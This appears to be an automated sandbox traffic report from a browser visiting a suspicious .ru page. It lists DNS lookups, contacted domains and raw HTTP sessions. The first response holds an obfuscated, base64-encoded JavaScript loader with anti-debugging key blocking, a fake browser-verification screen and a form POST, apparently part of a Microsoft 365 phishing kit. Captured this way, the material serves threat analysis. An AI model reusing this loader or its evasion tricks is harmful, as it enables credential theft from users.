                                                                                                                                                                                                  Jan 14, 2025 23:38:03.800556898 CET1.1.1.1192.168.2.160x412eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.800556898 CET1.1.1.1192.168.2.160x412eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.795671940 CET1.1.1.1192.168.2.160x68b1No error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.795671940 CET1.1.1.1192.168.2.160x68b1No error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.815888882 CET1.1.1.1192.168.2.160xb40eNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.815888882 CET1.1.1.1192.168.2.160xb40eNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.851440907 CET1.1.1.1192.168.2.160xa527No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.851440907 CET1.1.1.1192.168.2.160xa527No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.929229975 CET1.1.1.1192.168.2.160xf33fNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.929229975 CET1.1.1.1192.168.2.160xf33fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.929229975 CET1.1.1.1192.168.2.160xf33fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.930589914 CET1.1.1.1192.168.2.160xad0dNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.930589914 CET1.1.1.1192.168.2.160xad0dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.769633055 CET1.1.1.1192.168.2.160xc833No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.770376921 CET1.1.1.1192.168.2.160xa8a4No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  • 6y.tickarmoz.ru
                                                                                                                                                                                                  • https:
                                                                                                                                                                                                    • challenges.cloudflare.com
                                                                                                                                                                                                    • cdnjs.cloudflare.com
                                                                                                                                                                                                    • code.jquery.com
                                                                                                                                                                                                    • x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru
                                                                                                                                                                                                    • afed493c575e33914867d9dfa75363d0.azr.footprintdns.com
                                                                                                                                                                                                  • a.nel.cloudflare.com
                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.1649706172.67.140.1334436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:47 UTC663OUTGET /aY57/ HTTP/1.1
                                                                                                                                                                                                  Host: 6y.tickarmoz.ru
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1246INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:48 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Cache-Control: no-cache, private
                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4MY4iZ55%2FZCUfYVE2L%2ByfyBVZi5ed7sqIe1wE%2B6OpBYEWeu0huXA2pvONhoR4t84d1DYRDT%2BJ%2FZ8gj6HapCH1agZh1ZBqAKxs3podLsiUBF5Ys00uChm070Fjrtf8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1401&rtt_var=456&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1569&delivery_rate=1950684&cwnd=252&unsent_bytes=0&cid=06acc054b1c97dac&ts=470&x=0"
                                                                                                                                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5wUDFDYlhHdFNTR1VUbkN2ekhSanc9PSIsInZhbHVlIjoiRzlVYS9uQitTVjEyYlpHS09DbDJRc3BwSVB6anQrbis5bVlSVk9aYXQ1b290VTUvM2JrWlJlaHdKYWNzWDQ1QUgzOUhsbzJnbE1RVWp2V3ZnQ1crdXVxSGFVSW02NGtpSkdzVW4yc2d5VE03d0RpNmIwZUp0K2FTMFhiVVVHSk4iLCJtYWMiOiJlYzg0YTFiZWM0ZmU3N2MzMTE3MjkwNzcwNzc3YjJlZTg2Y2NkNGE4MjU5OGNiMjNiNzc2NTYwOTMyYTA5ODA3IiwidGFnIjoiIn0%3D; expires=Wed, 15-Jan-2025 00:37:48 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 63 7a 4d 30 74 4e 4f 45 68 68 54 46 46 50 4e 6b 30 33 52 58 56 79 55 30 5a 58 4e 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 6e 68 52 55 7a 6b 76 59 33 6b 35 62 6e 42 75 56 32 31 72 64 6d 31 6f 63 6d 5a 54 61 58 56 36 5a 32 5a 45 56 6b 74 36 56 54 4d 77 4e 54 64 4c 59 58 41 35 4e 47 6c 57 56 7a 64 46 51 31 68 4d 4f 46 4a 53 57 47 73 30 54 30 70 77 61 7a 56 71 62 6a 63 35 5a 7a 59 76 5a 56 4a 69 61 55 74 36 5a 57 31 48 52 6b 35 73 64 45 52 43 62 6a 63 33 63 31 4a 54 4b 33 56 4c 62 47 46 6f 64 6a 4a 31 63 54 5a 68 4f 55 46 68 51 6c 42 30 53 55 74 77 54 33 41 77 53 7a 46 54 61 44 41 32 4c 33 4a 53 51 7a 63 77 63 30 70 71 65 6a 55
                                                                                                                                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImczM0tNOEhhTFFPNk03RXVyU0ZXNXc9PSIsInZhbHVlIjoiVnhRUzkvY3k5bnBuV21rdm1ocmZTaXV6Z2ZEVkt6VTMwNTdLYXA5NGlWVzdFQ1hMOFJSWGs0T0pwazVqbjc5ZzYvZVJiaUt6ZW1HRk5sdERCbjc3c1JTK3VLbGFodjJ1cTZhOUFhQlB0SUtwT3AwSzFTaDA2L3JSQzcwc0pqejU
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 34 63 66 37 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 62 6f 75 6e 63 65 20 77 68 65 6e 20 79 6f 75 20 68 69 74 20 62 6f 74 74 6f 6d 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 72 5a 55 35 72 4c 6e 52 70 59 32 74 68 63 6d 31 76 65 69 35 79 64 53 39 68 57 54 55 33 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e
                                                                                                                                                                                                  Data Ascii: 4cf7... Success is how high you bounce when you hit bottom. --><script>if(atob("aHR0cHM6Ly9rZU5rLnRpY2thcm1vei5ydS9hWTU3Lw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4N
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 51 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 44 5a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 4e 4a 61
                                                                                                                                                                                                  Data Ascii: QuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogODZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI2NJa
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47
                                                                                                                                                                                                  Data Ascii: yZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKG
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 49 47 4e 76 62 6e 4e 30 49 48 4e 5a 52 6c 5a 70 65 6d 52 6a 65 58 51 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 48 4e 5a 52 6c 5a 70 65 6d 52 6a 65 58 51 67 4c 53 42 69 54 57 64 5a 62 56 68 74 56 55 64 4f 49 44 34 67 59 30 35 36 61 6e 46 43 62 47 31 69 52 79 41 6d 4a 69 41 68 63 30 6c 69 56 6e 42 42 51 55 64 53 54 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 52 33 68 61 55 6d 56 79 56 30 5a 53 61 53 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 7a 53 57 4a 57 63 45 46 42 52 31 4a 4d 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35
                                                                                                                                                                                                  Data Ascii: IGNvbnN0IHNZRlZpemRjeXQgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKHNZRlZpemRjeXQgLSBiTWdZbVhtVUdOID4gY056anFCbG1iRyAmJiAhc0liVnBBQUdSTCkgew0KICAgICAgICAgICAgR3haUmVyV0ZSaSA9IHRydWU7DQogICAgICAgICAgICBzSWJWcEFBR1JMID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvdy5
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 55 46 4e 47 61 32 46 69 5a 6b 39 47 54 43 49 2b 44 51 70 53 64 57 35 75 61 57 35 6e 49 47 4a 79 62 33 64 7a 5a 58 49 67 64 6d 56 79 61 57 5a 70 59 32 46 30 61 57 39 75 49 48 42 79 62 32 4e 6c 63 33 4e 6c 63 79 42 6d 62 33 49 67 65 57 39 31 63 69 42 77 63 6d 39 30 5a 57 4e 30 61 57 39 75 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63 32 4e 79 61 58 42 30
                                                                                                                                                                                                  Data Ascii: SJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iUFNGa2FiZk9GTCI+DQpSdW5uaW5nIGJyb3dzZXIgdmVyaWZpY2F0aW9uIHByb2Nlc3NlcyBmb3IgeW91ciBwcm90ZWN0aW9uLg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c2NyaXB0
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 47 64 51 63 57 46 45 59 33 64 73 61 47 34 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 52 33 68 61 55 6d 56 79 56 30 5a 53 61 53 41 39 50 53 42 6d 59 57 78 7a 5a 53 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49
                                                                                                                                                                                                  Data Ascii: V3IEZvcm1EYXRhKGdQcWFEY3dsaG4pDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgaWYoR3haUmVyV0ZSaSA9PSBmYWxzZSl7DQogICAgICAgI
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 74 20 6b 50 45 69 44 51 4f 6c 55 6d 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 58 43 54 49 67 61 7a 4c 59 45 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 58 43 54 49 67 61 7a 4c 59 45 2e 70 61 74 68 6e 61 6d 65 20 3d 20 58 43 54 49 67 61 7a 4c 59 45 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 6f 69 44 64 63 75 47 77 67 73 20 3d 20 58 43 54 49 67 61 7a 4c 59 45 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 6f 69 44 64 63 75 47 77 67 73 20 3d 3d 20 6b 50 45 69 44 51 4f 6c 55 6d 29 7b 0d 0a 64 6f 63
                                                                                                                                                                                                  Data Ascii: t kPEiDQOlUm = window.location.pathname.split('%23')[0].split('%3F')[0];if (XCTIgazLYE.pathname.endsWith('/')) {XCTIgazLYE.pathname = XCTIgazLYE.pathname.slice(0, -1);}const oiDdcuGwgs = XCTIgazLYE.pathname+'/';if(oiDdcuGwgs == kPEiDQOlUm){doc
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 59 30 6c 6f 63 46 52 71 51 6c 42 73 56 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 4e 4a 61 48 42 55 61 6b 4a 51 62 46 51 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 44 5a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a
                                                                                                                                                                                                  Data Ascii: plOjEuNXJlbTt9DQp9DQojY0locFRqQlBsVCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2NJaHBUakJQbFQuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogODZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZ
                                                                                                                                                                                                  2025-01-14 22:37:48 UTC1369INData Raw: 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43
                                                                                                                                                                                                  Data Ascii: kb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgIC


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.1649708104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC647OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:49 GMT
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                  location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cdeee1f17b5-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.2.1649709104.17.24.144436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC649OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:49 GMT
                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                                                                                                  ETag: W/"61182885-40eb"
                                                                                                                                                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 552080
                                                                                                                                                                                                  Expires: Sun, 04 Jan 2026 22:37:49 GMT
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYHcvllEZ9bHCmPagaU%2F2%2B8hQ4Qu4dJ5pw2dHG29Uq8CegQmVaYs%2FZaJV2glH9SQo7mNbdciETr4mz16blCRLHf0zXXKgRtgbHP%2F6TkZNgO4WoWPGdY4oOdd%2Fwes46yqP%2Fx4oW26"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cdeecdd42ee-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
